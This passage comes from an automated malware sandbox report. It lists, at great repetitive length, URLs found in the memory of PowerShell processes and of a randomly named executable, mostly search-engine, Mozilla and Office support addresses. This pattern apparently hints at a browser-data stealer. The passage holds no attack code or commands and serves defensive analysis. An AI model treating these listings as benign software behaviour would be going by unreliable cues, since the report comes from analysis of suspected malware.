wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000142CB000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001314E000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000141F2000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001425E000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013099000.00000004.00000800.00020000.00000000.sdmp, LTk6PkdZlU.16.dr, SD5LLGHZu2.16.dr, fvRXkhz3Kc.16.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                          Source: powershell.exe, 00000001.00000002.1834144295.000001BD8BD11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1831771750.00000170A6A31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1821187108.0000023040411000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1834253606.00000277488F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1843352066.0000022B257C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013A01000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001440F000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014295000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014301000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013A78000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001394D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000012FE5000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014337000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000143A3000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001436D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014228000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000143D9000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013710000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000142CB000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001314E000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000141F2000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001425E000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013099000.00000004.00000800.00020000.00000000.sdmp, LTk6PkdZlU.16.dr, SD5LLGHZu2.16.dr, fvRXkhz3Kc.16.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013A01000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001440F000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014295000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014301000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013A78000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001394D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000012FE5000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014337000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000143A3000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001436D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014228000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000143D9000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013710000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000142CB000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001314E000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000141F2000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001425E000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013099000.00000004.00000800.00020000.00000000.sdmp, LTk6PkdZlU.16.dr, SD5LLGHZu2.16.dr, fvRXkhz3Kc.16.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013A01000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001440F000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014295000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014301000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013A78000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001394D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000012FE5000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014337000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000143A3000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001436D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014228000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000143D9000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013710000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000142CB000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001314E000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000141F2000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001425E000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013099000.00000004.00000800.00020000.00000000.sdmp, LTk6PkdZlU.16.dr, SD5LLGHZu2.16.dr, fvRXkhz3Kc.16.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                          Source: powershell.exe, 00000004.00000002.2433222897.0000023050483000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2518697847.0000022B3589F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                          Source: powershell.exe, 00000004.00000002.2433222897.0000023050483000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2518697847.0000022B3589F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                          Source: powershell.exe, 00000004.00000002.2433222897.0000023050483000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2518697847.0000022B3589F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013A01000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001440F000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014295000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014301000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013A78000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001394D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000012FE5000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014337000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000143A3000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001436D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014228000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000143D9000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013710000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000142CB000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001314E000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000141F2000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001425E000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013099000.00000004.00000800.00020000.00000000.sdmp, LTk6PkdZlU.16.dr, SD5LLGHZu2.16.dr, fvRXkhz3Kc.16.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013A01000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001440F000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014295000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014301000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013A78000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001394D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000012FE5000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014337000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000143A3000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001436D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014228000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000143D9000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013710000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000142CB000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001314E000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000141F2000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001425E000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013099000.00000004.00000800.00020000.00000000.sdmp, LTk6PkdZlU.16.dr, SD5LLGHZu2.16.dr, fvRXkhz3Kc.16.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013A01000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001440F000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014295000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014301000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013A78000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001394D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000012FE5000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014337000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000143A3000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001436D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014228000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000143D9000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013710000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000142CB000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001314E000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000141F2000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001425E000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013099000.00000004.00000800.00020000.00000000.sdmp, LTk6PkdZlU.16.dr, SD5LLGHZu2.16.dr, fvRXkhz3Kc.16.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                          Source: powershell.exe, 00000008.00000002.1843352066.0000022B259E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                          Source: powershell.exe, 00000001.00000002.2513469202.000001BD9BD83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2433222897.0000023050483000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                          Source: wyPcM5nqV0.16.drString found in binary or memory: https://support.mozilla.org
                          Source: wyPcM5nqV0.16.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                          Source: wyPcM5nqV0.16.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013B50000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000135A3000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001355D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013C22000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000133FF000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013B96000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000136BB000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013701000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013AC4000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013C68000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013192000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000133B9000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000135E9000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013675000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001362F000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001348B000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013CAE000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000134D1000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013445000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001332D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013373000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001334E000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013696000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000134F2000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001357E000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013394000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013308000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013C43000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013A9F000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013B2B000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013BB7000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000135C4000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000134AC000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013C89000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001360A000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013538000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013BFD000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013466000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013420000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001316D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013AE5000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000136DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013B50000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000135A3000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001355D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013C22000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000133FF000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013B96000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000136BB000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013701000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013AC4000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013C68000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013192000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000133B9000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000135E9000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013675000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001362F000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001348B000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013CAE000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000134D1000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013445000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001332D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013373000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001334E000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013696000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000134F2000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001357E000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013394000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013308000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013C43000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013A9F000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013B2B000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013BB7000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000135C4000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000134AC000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013C89000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001360A000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013538000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013BFD000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013466000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013420000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 